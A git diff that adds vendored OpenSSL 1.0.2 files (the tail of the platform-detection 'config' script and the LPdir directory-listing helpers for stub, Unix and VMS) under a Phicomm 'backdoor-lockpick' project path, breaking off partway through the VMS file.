+	      echo "         You have about 5 seconds to press Ctrl-C to abort."
+	      (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	    fi
+	fi
+	if [ "$ISA64" = "1" -a "$KERNEL_BITS" = "64" ]; then
+	    OUT="darwin64-x86_64-cc"
+	else
+	    OUT="darwin-i386-cc"
+	fi ;;
+  armv6+7-*-iphoneos)
+	options="$options -arch%20armv6 -arch%20armv7"
+	OUT="iphoneos-cross" ;;
+  *-*-iphoneos)
+	options="$options -arch%20${MACHINE}"
+	OUT="iphoneos-cross" ;;
+  alpha-*-linux2)
+        ISA=`awk '/cpu model/{print$4;exit(0);}' /proc/cpuinfo`
+	case ${ISA:-generic} in
+	*[678])	OUT="linux-alpha+bwx-$CC" ;;
+	*)	OUT="linux-alpha-$CC" ;;
+	esac
+	if [ "$CC" = "gcc" ]; then
+	    case ${ISA:-generic} in
+	    EV5|EV45)		options="$options -mcpu=ev5";;
+	    EV56|PCA56)		options="$options -mcpu=ev56";;
+	    *)			options="$options -mcpu=ev6";;
+	    esac
+	fi
+	;;
+  ppc64-*-linux2)
+	if [ -z "$KERNEL_BITS" ]; then
+	    echo "WARNING! If you wish to build 64-bit library, then you have to"
+	    echo "         invoke './Configure linux-ppc64' *manually*."
+	    if [ "$TEST" = "false" -a -t 1 ]; then
+		echo "         You have about 5 seconds to press Ctrl-C to abort."
+		(trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	    fi
+	fi
+	if [ "$KERNEL_BITS" = "64" ]; then
+	    OUT="linux-ppc64"
+	else
+	    OUT="linux-ppc"
+	    (echo "__LP64__" | gcc -E -x c - 2>/dev/null | grep "^__LP64__" 2>&1 > /dev/null) || options="$options -m32"
+	fi
+	;;
+  ppc64le-*-linux2) OUT="linux-ppc64le" ;;
+  ppc-*-linux2) OUT="linux-ppc" ;;
+  mips64*-*-linux2)
+	echo "WARNING! If you wish to build 64-bit library, then you have to"
+	echo "         invoke './Configure linux64-mips64' *manually*."
+	if [ "$TEST" = "false" -a -t 1 ]; then
+	    echo "         You have about 5 seconds to press Ctrl-C to abort."
+	    (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	fi
+	OUT="linux-mips64"
+	;;
+  mips*-*-linux2) OUT="linux-mips32" ;;
+  ppc60x-*-vxworks*) OUT="vxworks-ppc60x" ;;
+  ppcgen-*-vxworks*) OUT="vxworks-ppcgen" ;;
+  pentium-*-vxworks*) OUT="vxworks-pentium" ;;
+  simlinux-*-vxworks*) OUT="vxworks-simlinux" ;;
+  mips-*-vxworks*) OUT="vxworks-mips";;
+  ia64-*-linux?) OUT="linux-ia64" ;;
+  sparc64-*-linux2)
+	echo "WARNING! If you *know* that your GNU C supports 64-bit/V9 ABI"
+	echo "         and wish to build 64-bit library, then you have to"
+	echo "         invoke './Configure linux64-sparcv9' *manually*."
+	if [ "$TEST" = "false" -a -t 1 ]; then
+	  echo "          You have about 5 seconds to press Ctrl-C to abort."
+	  (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	fi
+	OUT="linux-sparcv9" ;;
+  sparc-*-linux2)
+	KARCH=`awk '/^type/{print$3;exit(0);}' /proc/cpuinfo`
+	case ${KARCH:-sun4} in
+	sun4u*)	OUT="linux-sparcv9" ;;
+	sun4m)	OUT="linux-sparcv8" ;;
+	sun4d)	OUT="linux-sparcv8" ;;
+	*)	OUT="linux-generic32"; options="$options -DB_ENDIAN" ;;
+	esac ;;
+  parisc*-*-linux2)
+	# 64-bit builds under parisc64 linux are not supported and
+	# compiler is expected to generate 32-bit objects...
+	CPUARCH=`awk '/cpu family/{print substr($5,1,3); exit(0);}' /proc/cpuinfo`
+	CPUSCHEDULE=`awk '/^cpu.[ 	]*: PA/{print substr($3,3); exit(0);}' /proc/cpuinfo`
+
+	# ??TODO ??  Model transformations
+	# 0. CPU Architecture for the 1.1 processor has letter suffixes. We strip that off
+	#    assuming no further arch. identification will ever be used by GCC.
+	# 1. I'm most concerned about whether is a 7300LC is closer to a 7100 versus a 7100LC.
+	# 2. The variant 64-bit processors cause concern should GCC support explicit schedulers
+	#    for these chips in the future.
+	#         PA7300LC -> 7100LC (1.1)
+	#         PA8200   -> 8000   (2.0)
+	#         PA8500   -> 8000   (2.0)
+	#         PA8600   -> 8000   (2.0)
+
+	CPUSCHEDULE=`echo $CPUSCHEDULE|sed -e 's/7300LC/7100LC/' -e 's/8.00/8000/'`
+	# Finish Model transformations
+
+	options="$options -DB_ENDIAN -mschedule=$CPUSCHEDULE -march=$CPUARCH"
+	OUT="linux-generic32" ;;
+  armv[1-3]*-*-linux2) OUT="linux-generic32" ;;
+  armv[7-9]*-*-linux2) OUT="linux-armv4"; options="$options -march=armv7-a" ;;
+  arm*-*-linux2) OUT="linux-armv4" ;;
+  aarch64-*-linux2) OUT="linux-aarch64" ;;
+  sh*b-*-linux2) OUT="linux-generic32"; options="$options -DB_ENDIAN" ;;
+  sh*-*-linux2)  OUT="linux-generic32"; options="$options -DL_ENDIAN" ;;
+  m68k*-*-linux2) OUT="linux-generic32"; options="$options -DB_ENDIAN" ;;
+  s390-*-linux2) OUT="linux-generic32"; options="$options -DB_ENDIAN" ;;
+  s390x-*-linux2)
+	# To be uncommented when glibc bug is fixed, see Configure...
+	#if egrep -e '^features.* highgprs' /proc/cpuinfo >/dev/null ; then
+	#  echo "WARNING! If you wish to build \"highgprs\" 32-bit library, then you"
+	#  echo "         have to invoke './Configure linux32-s390x' *manually*."
+	#  if [ "$TEST" = "false" -a -t -1 ]; then
+	#    echo "         You have about 5 seconds to press Ctrl-C to abort."
+	#    (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	#  fi
+	#fi
+	OUT="linux64-s390x"
+	;;
+  x86_64-*-linux?) OUT="linux-x86_64" ;;
+  *86-*-linux2) OUT="linux-elf"
+	if [ "$GCCVER" -gt 28 ]; then
+          if grep '^model.*Pentium' /proc/cpuinfo >/dev/null ; then
+	    options="$options -march=pentium"
+          fi
+          if grep '^model.*Pentium Pro' /proc/cpuinfo >/dev/null ; then
+	    options="$options -march=pentiumpro"
+          fi
+          if grep '^model.*K6' /proc/cpuinfo >/dev/null ; then
+	    options="$options -march=k6"
+          fi
+        fi ;;
+  *-*-linux1) OUT="linux-aout" ;;
+  *-*-linux2) OUT="linux-generic32" ;;
+  sun4[uv]*-*-solaris2)
+	OUT="solaris-sparcv9-$CC"
+	ISA64=`(isalist) 2>/dev/null | grep sparcv9`
+	if [ "$ISA64" != "" -a "$KERNEL_BITS" = "" ]; then
+	    if [ "$CC" = "cc" -a $CCVER -ge 50 ]; then
+		echo "WARNING! If you wish to build 64-bit library, then you have to"
+		echo "         invoke './Configure solaris64-sparcv9-cc' *manually*."
+		if [ "$TEST" = "false" -a -t 1 ]; then
+		  echo "         You have about 5 seconds to press Ctrl-C to abort."
+		  (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+		fi
+	    elif [ "$CC" = "gcc" -a "$GCC_ARCH" = "-m64" ]; then
+		# $GCC_ARCH denotes default ABI chosen by compiler driver
+		# (first one found on the $PATH). I assume that user
+		# expects certain consistency with the rest of his builds
+		# and therefore switch over to 64-bit. <appro>
+		OUT="solaris64-sparcv9-gcc"
+		echo "WARNING! If you wish to build 32-bit library, then you have to"
+		echo "         invoke './Configure solaris-sparcv9-gcc' *manually*."
+		if [ "$TEST" = "false" -a -t 1 ]; then
+		  echo "         You have about 5 seconds to press Ctrl-C to abort."
+		  (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+		fi
+	    elif [ "$GCC_ARCH" = "-m32" ]; then
+		echo "NOTICE! If you *know* that your GNU C supports 64-bit/V9 ABI"
+		echo "        and wish to build 64-bit library, then you have to"
+		echo "        invoke './Configure solaris64-sparcv9-gcc' *manually*."
+		if [ "$TEST" = "false" -a -t 1 ]; then
+		  echo "         You have about 5 seconds to press Ctrl-C to abort."
+		  (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+		fi
+	    fi
+	fi
+	if [ "$ISA64" != "" -a "$KERNEL_BITS" = "64" ]; then
+	    OUT="solaris64-sparcv9-$CC"
+	fi
+	;;
+  sun4m-*-solaris2)	OUT="solaris-sparcv8-$CC" ;;
+  sun4d-*-solaris2)	OUT="solaris-sparcv8-$CC" ;;
+  sun4*-*-solaris2)	OUT="solaris-sparcv7-$CC" ;;
+  *86*-*-solaris2)
+	ISA64=`(isalist) 2>/dev/null | grep amd64`
+	if [ "$ISA64" != "" -a ${KERNEL_BITS:-64} -eq 64 ]; then
+	    OUT="solaris64-x86_64-$CC"
+	else
+	    OUT="solaris-x86-$CC"
+	    if [ `uname -r | sed -e 's/5\.//'` -lt 10 ]; then
+		options="$options no-sse2"
+	    fi
+	fi
+	;;
+  *-*-sunos4)		OUT="sunos-$CC" ;;
+
+  *86*-*-bsdi4)		OUT="BSD-x86-elf"; options="$options no-sse2 -ldl" ;;
+  alpha*-*-*bsd*)	OUT="BSD-generic64"; options="$options -DL_ENDIAN" ;;
+  powerpc64-*-*bsd*)	OUT="BSD-generic64"; options="$options -DB_ENDIAN" ;;
+  sparc64-*-*bsd*)	OUT="BSD-sparc64" ;;
+  ia64-*-*bsd*)		OUT="BSD-ia64" ;;
+  amd64-*-*bsd*)	OUT="BSD-x86_64" ;;
+  *86*-*-*bsd*)		# mimic ld behaviour when it's looking for libc...
+			if [ -L /usr/lib/libc.so ]; then	# [Free|Net]BSD
+			    libc=/usr/lib/libc.so
+			else					# OpenBSD
+			    # ld searches for highest libc.so.* and so do we
+			    libc=`(ls /usr/lib/libc.so.* /lib/libc.so.* | tail -1) 2>/dev/null`
+			fi
+			case "`(file -L $libc) 2>/dev/null`" in
+			*ELF*)	OUT="BSD-x86-elf" ;;
+			*)	OUT="BSD-x86"; options="$options no-sse2" ;;
+			esac ;;
+  *-*-*bsd*)		OUT="BSD-generic32" ;;
+
+  *-*-osf)		OUT="osf1-alpha-cc" ;;
+  *-*-tru64)		OUT="tru64-alpha-cc" ;;
+  *-*-[Uu]nix[Ww]are7)
+	if [ "$CC" = "gcc" ]; then
+	  OUT="unixware-7-gcc" ; options="$options no-sse2"
+	else    
+	  OUT="unixware-7" ; options="$options no-sse2 -D__i386__"
+	fi
+	;;
+  *-*-[Uu]nix[Ww]are20*) OUT="unixware-2.0"; options="$options no-sse2 no-sha512" ;;
+  *-*-[Uu]nix[Ww]are21*) OUT="unixware-2.1"; options="$options no-sse2 no-sha512" ;;
+  *-*-vos)
+	options="$options no-threads no-shared no-asm no-dso"
+	EXE=".pm"
+	OUT="vos-$CC" ;;
+  BS2000-siemens-sysv4) OUT="BS2000-OSD" ;;
+  RM*-siemens-sysv4) OUT="ReliantUNIX" ;;
+  *-siemens-sysv4) OUT="SINIX" ;;
+  *-hpux1*)
+	if [ $CC = "gcc" -a $GCC_BITS = "64" ]; then
+	    OUT="hpux64-parisc2-gcc"
+	fi
+	[ "$KERNEL_BITS" ] || KERNEL_BITS=`(getconf KERNEL_BITS) 2>/dev/null`
+	KERNEL_BITS=${KERNEL_BITS:-32}
+	CPU_VERSION=`(getconf CPU_VERSION) 2>/dev/null`
+	CPU_VERSION=${CPU_VERSION:-0}
+	# See <sys/unistd.h> for further info on CPU_VERSION.
+	if   [ $CPU_VERSION -ge 768 ]; then	# IA-64 CPU
+	     if [ $KERNEL_BITS -eq 64 -a "$CC" = "cc" ]; then
+	        OUT="hpux64-ia64-cc"
+             else
+	        OUT="hpux-ia64-cc"
+             fi
+	elif [ $CPU_VERSION -ge 532 ]; then	# PA-RISC 2.x CPU
+	     OUT=${OUT:-"hpux-parisc2-${CC}"}
+	     if [ $KERNEL_BITS -eq 64 -a "$CC" = "cc" ]; then
+		echo "WARNING! If you wish to build 64-bit library then you have to"
+		echo "         invoke './Configure hpux64-parisc2-cc' *manually*."
+		if [ "$TEST" = "false" -a -t 1 ]; then
+		  echo "         You have about 5 seconds to press Ctrl-C to abort."
+		  (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+		fi
+	     fi
+	elif [ $CPU_VERSION -ge 528 ]; then	# PA-RISC 1.1+ CPU
+	     OUT="hpux-parisc-${CC}"
+	elif [ $CPU_VERSION -ge 523 ]; then	# PA-RISC 1.0 CPU
+	     OUT="hpux-parisc-${CC}"
+	else					# Motorola(?) CPU
+	     OUT="hpux-$CC"
+	fi
+	options="$options -D_REENTRANT" ;;
+  *-hpux)	OUT="hpux-parisc-$CC" ;;
+  *-aix)
+	[ "$KERNEL_BITS" ] || KERNEL_BITS=`(getconf KERNEL_BITMODE) 2>/dev/null`
+	KERNEL_BITS=${KERNEL_BITS:-32}
+	OBJECT_MODE=${OBJECT_MODE:-32}
+	if [ "$CC" = "gcc" ]; then
+	    OUT="aix-gcc"
+          if [ $OBJECT_MODE -eq 64 ]; then
+            echo 'Your $OBJECT_MODE was found to be set to 64'
+            OUT="aix64-gcc"
+          fi
+	elif [ $OBJECT_MODE -eq 64 ]; then
+	    echo 'Your $OBJECT_MODE was found to be set to 64' 
+	    OUT="aix64-cc"
+	else
+	    OUT="aix-cc"
+	    if [ $KERNEL_BITS -eq 64 ]; then
+		echo "WARNING! If you wish to build 64-bit kit, then you have to"
+		echo "         invoke './Configure aix64-cc' *manually*."
+		if [ "$TEST" = "false" -a -t 1 ]; then
+		    echo "         You have ~5 seconds to press Ctrl-C to abort."
+		    (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+		fi
+	    fi
+	fi
+	if (lsattr -E -O -l `lsdev -c processor|awk '{print$1;exit}'` | grep -i powerpc) >/dev/null 2>&1; then
+	    :	# this applies even to Power3 and later, as they return PowerPC_POWER[345]
+	else
+	    options="$options no-asm"
+	fi
+	;;
+  # these are all covered by the catchall below
+  # *-dgux) OUT="dgux" ;;
+  mips-sony-newsos4) OUT="newsos4-gcc" ;;
+  *-*-cygwin_pre1.3) OUT="Cygwin-pre1.3" ;;
+  *-*-cygwin) OUT="Cygwin" ;;
+  t3e-cray-unicosmk) OUT="cray-t3e" ;;
+  j90-cray-unicos) OUT="cray-j90" ;;
+  nsr-tandem-nsk) OUT="tandem-c89" ;;
+  beos-*) OUT="$GUESSOS" ;;
+  x86pc-*-qnx6) OUT="QNX6-i386" ;;
+  *-*-qnx6) OUT="QNX6" ;;
+  x86-*-android|i?86-*-android) OUT="android-x86" ;;
+  armv[7-9]*-*-android) OUT="android-armv7" ;;
+  *) OUT=`echo $GUESSOS | awk -F- '{print $3}'`;;
+esac
+
+# NB: This atalla support has been superceded by the ENGINE support
+# That contains its own header and definitions anyway. Support can
+# be enabled or disabled on any supported platform without external
+# headers, eg. by adding the "hw-atalla" switch to ./config or
+# perl Configure
+#
+# See whether we can compile Atalla support
+#if [ -f /usr/include/atasi.h ]
+#then
+#  options="$options -DATALLA"
+#fi
+
+if expr "$options" : '.*no\-asm' > /dev/null; then :; else
+  sh -c "$CROSS_COMPILE${CC:-gcc} -Wa,--help -c -o /tmp/null.$$.o -x assembler /dev/null && rm /tmp/null.$$.o" 2>&1 | \
+  grep \\--noexecstack >/dev/null && \
+  options="$options -Wa,--noexecstack"
+fi
+
+# gcc < 2.8 does not support -march=ultrasparc
+if [ "$OUT" = solaris-sparcv9-gcc -a $GCCVER -lt 28 ]
+then
+  echo "WARNING! Falling down to 'solaris-sparcv8-gcc'."
+  echo "         Upgrade to gcc-2.8 or later."
+  sleep 5
+  OUT=solaris-sparcv8-gcc
+fi
+if [ "$OUT" = "linux-sparcv9" -a $GCCVER -lt 28 ]
+then
+  echo "WARNING! Falling down to 'linux-sparcv8'."
+  echo "         Upgrade to gcc-2.8 or later."
+  sleep 5
+  OUT=linux-sparcv8
+fi
+
+case "$GUESSOS" in
+  i386-*) options="$options 386" ;;
+esac
+
+for i in aes bf camellia cast des dh dsa ec hmac idea md2 md5 mdc2 rc2 rc4 rc5 ripemd rsa seed sha
+do
+  if [ ! -d crypto/$i ]
+  then
+    options="$options no-$i"
+  fi
+done
+
+# Discover Kerberos 5 (since it's still a prototype, we don't
+# do any guesses yet, that's why this section is commented away.
+#if [ -d /usr/kerberos ]; then
+#    krb5_dir=/usr/kerberos
+#    if [ \( -f $krb5_dir/lib/libgssapi_krb5.a -o -f $krb5_dir/lib/libgssapi_krb5.so* \)\
+#	-a \( -f $krb5_dir/lib/libkrb5.a -o -f $krb5_dir/lib/libkrb5.so* \)\
+#	-a \( -f $krb5_dir/lib/libcom_err.a -o -f $krb5_dir/lib/libcom_err.so* \)\
+#	-a \( -f $krb5_dir/lib/libk5crypto.a -o -f $krb5_dir/lib/libk5crypto.so* \)\
+#	-a \( -f $krb5_dir/include/krb5.h \) ]; then
+#	options="$options --with-krb5-flavor=MIT"
+#    fi
+#elif [ -d /usr/heimdal ]; then
+#    krb5_dir=/usr/heimdal
+#    if [ \( -f $krb5_dir/lib/libgssapi.a -o -f $krb5_dir/lib/libgssapi.so* \)\
+#	-a \( -f $krb5_dir/lib/libkrb5.a -o -f $krb5_dir/lib/libkrb5.so* \)\
+#	-a \( -f $krb5_dir/lib/libcom_err.a -o -f $krb5_dir/lib/libcom_err.so* \)\
+#	-a \( -f $krb5_dir/include/krb5.h \) ]; then
+#	options="$options --with-krb5-flavor=Heimdal"
+#    fi
+#fi
+
+if [ -z "$OUT" ]; then
+  OUT="$CC"
+fi
+
+if [ ".$PERL" = . ] ; then
+	for i in . `echo $PATH | sed 's/:/ /g'`; do
+		if [ -f "$i/perl5$EXE" ] ; then
+			PERL="$i/perl5$EXE"
+			break;
+		fi;
+	done
+fi
+
+if [ ".$PERL" = . ] ; then
+	for i in . `echo $PATH | sed 's/:/ /g'`; do
+		if [ -f "$i/perl$EXE" ] ; then
+			if "$i/perl$EXE" -e 'exit($]<5.0)'; then
+				PERL="$i/perl$EXE"
+				break;
+			fi;
+		fi;
+	done
+fi
+
+if [ ".$PERL" = . ] ; then
+	echo "You need Perl 5."
+	exit 1
+fi
+
+# run Configure to check to see if we need to specify the 
+# compiler for the platform ... in which case we add it on
+# the end ... otherwise we leave it off
+
+$PERL ./Configure LIST | grep "$OUT-$CC" > /dev/null
+if [ $? = "0" ]; then
+  OUT="$OUT-$CC"
+fi
+
+OUT="$PREFIX$OUT"
+
+$PERL ./Configure LIST | grep "$OUT" > /dev/null
+if [ $? = "0" ]; then
+  echo Configuring for $OUT
+
+  if [ "$TEST" = "true" ]; then
+    echo $PERL ./Configure $OUT $options
+  else
+    $PERL ./Configure $OUT $options
+  fi
+else
+  echo "This system ($OUT) is not supported. See file INSTALL for details."
+fi
+)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_nyi.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_nyi.c
new file mode 100644
index 0000000..283d5b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_nyi.c
@@ -0,0 +1,47 @@
+/*
+ * $LP: LPlib/source/LPdir_win.c,v 1.1 2004/06/14 10:07:56 _cvs_levitte Exp $
+ */
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifndef LPDIR_H
+# include "LPdir.h"
+#endif
+
+struct LP_dir_context_st {
+    void *dummy;
+};
+const char *LP_find_file(LP_DIR_CTX **ctx, const char *directory)
+{
+    errno = EINVAL;
+    return 0;
+}
+
+int LP_find_file_end(LP_DIR_CTX **ctx)
+{
+    errno = EINVAL;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_unix.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_unix.c
new file mode 100644
index 0000000..bead6ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_unix.c
@@ -0,0 +1,126 @@
+/*
+ * $LP: LPlib/source/LPdir_unix.c,v 1.11 2004/09/23 22:07:22 _cvs_levitte Exp
+ * $
+ */
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stddef.h>
+#include <stdlib.h>
+#include <limits.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <errno.h>
+#ifndef LPDIR_H
+# include "LPdir.h"
+#endif
+
+/*
+ * The POSIXly macro for the maximum number of characters in a file path is
+ * NAME_MAX.  However, some operating systems use PATH_MAX instead.
+ * Therefore, it seems natural to first check for PATH_MAX and use that, and
+ * if it doesn't exist, use NAME_MAX.
+ */
+#if defined(PATH_MAX)
+# define LP_ENTRY_SIZE PATH_MAX
+#elif defined(NAME_MAX)
+# define LP_ENTRY_SIZE NAME_MAX
+#endif
+
+/*
+ * Of course, there's the possibility that neither PATH_MAX nor NAME_MAX
+ * exist.  It's also possible that NAME_MAX exists but is define to a very
+ * small value (HP-UX offers 14), so we need to check if we got a result, and
+ * if it meets a minimum standard, and create or change it if not.
+ */
+#if !defined(LP_ENTRY_SIZE) || LP_ENTRY_SIZE<255
+# undef LP_ENTRY_SIZE
+# define LP_ENTRY_SIZE 255
+#endif
+
+struct LP_dir_context_st {
+    DIR *dir;
+    char entry_name[LP_ENTRY_SIZE + 1];
+};
+
+const char *LP_find_file(LP_DIR_CTX **ctx, const char *directory)
+{
+    struct dirent *direntry = NULL;
+
+    if (ctx == NULL || directory == NULL) {
+        errno = EINVAL;
+        return 0;
+    }
+
+    errno = 0;
+    if (*ctx == NULL) {
+        *ctx = (LP_DIR_CTX *)malloc(sizeof(LP_DIR_CTX));
+        if (*ctx == NULL) {
+            errno = ENOMEM;
+            return 0;
+        }
+        memset(*ctx, '\0', sizeof(LP_DIR_CTX));
+
+        (*ctx)->dir = opendir(directory);
+        if ((*ctx)->dir == NULL) {
+            int save_errno = errno; /* Probably not needed, but I'm paranoid */
+            free(*ctx);
+            *ctx = NULL;
+            errno = save_errno;
+            return 0;
+        }
+    }
+
+    direntry = readdir((*ctx)->dir);
+    if (direntry == NULL) {
+        return 0;
+    }
+
+    strncpy((*ctx)->entry_name, direntry->d_name,
+            sizeof((*ctx)->entry_name) - 1);
+    (*ctx)->entry_name[sizeof((*ctx)->entry_name) - 1] = '\0';
+    return (*ctx)->entry_name;
+}
+
+int LP_find_file_end(LP_DIR_CTX **ctx)
+{
+    if (ctx != NULL && *ctx != NULL) {
+        int ret = closedir((*ctx)->dir);
+
+        free(*ctx);
+        switch (ret) {
+        case 0:
+            return 1;
+        case -1:
+            return 0;
+        default:
+            break;
+        }
+    }
+    errno = EINVAL;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_vms.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_vms.c
new file mode 100644
index 0000000..88c7ddd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_vms.c
@@ -0,0 +1,195 @@
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stddef.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <descrip.h>
+#include <namdef.h>
+#include <rmsdef.h>
+#include <libfildef.h>
+#include <lib$routines.h>
+#include <strdef.h>
+#include <str$routines.h>
+#include <stsdef.h>
+#ifndef LPDIR_H
+# include "LPdir.h"
+#endif
+#include "vms_rms.h"
+
+/* Some compiler options hide EVMSERR. */
+#ifndef EVMSERR
+# define EVMSERR        65535   /* error for non-translatable VMS errors */
+#endif
+
+struct LP_dir_context_st {
+    unsigned long VMS_context;
+    char filespec[NAMX_MAXRSS + 1];
+    char result[NAMX_MAXRSS + 1];
+    struct dsc$descriptor_d filespec_dsc;
+    struct dsc$descriptor_d result_dsc;
+};
+
+const char *LP_find_file(LP_DIR_CTX **ctx, const char *directory)
+{
+    int status;
+    char *p, *r;
+    size_t l;
+    unsigned long flags = 0;
+
+/* Arrange 32-bit pointer to (copied) string storage, if needed. */
+#if __INITIAL_POINTER_SIZE == 64
+# pragma pointer_size save
+# pragma pointer_size 32
+    char *ctx_filespec_32p;
+# pragma pointer_size restore
+    char ctx_filespec_32[NAMX_MAXRSS + 1];
+#endif                          /* __INITIAL_POINTER_SIZE == 64 */
+
+#ifdef NAML$C_MAXRSS
+    flags |= LIB$M_FIL_LONG_NAMES;
+#endif
+
+    if (ctx == NULL || directory == NULL) {
+        errno = EINVAL;
+        return 0;
+    }
+
+    errno = 0;
+    if (*ctx == NULL) {
+        size_t filespeclen = strlen(directory);
+        char *filespec = NULL;
+
+        if (filespeclen == 0) {
+            errno = ENOENT;
+            return 0;
+        }
+
+        /* MUST be a VMS directory specification!  Let's estimate if it is. */
+        if (directory[filespeclen - 1] != ']'
+            && directory[filespeclen - 1] != '>'
+            && directory[filespeclen - 1] != ':') {
+            errno = EINVAL;
+            return 0;
+        }
+
+        filespeclen += 4;       /* "*.*;" */
+
+        if (filespeclen > NAMX_MAXRSS) {
+            errno = ENAMETOOLONG;
+            return 0;
+        }
+
+        *ctx = (LP_DIR_CTX *)malloc(sizeof(LP_DIR_CTX));
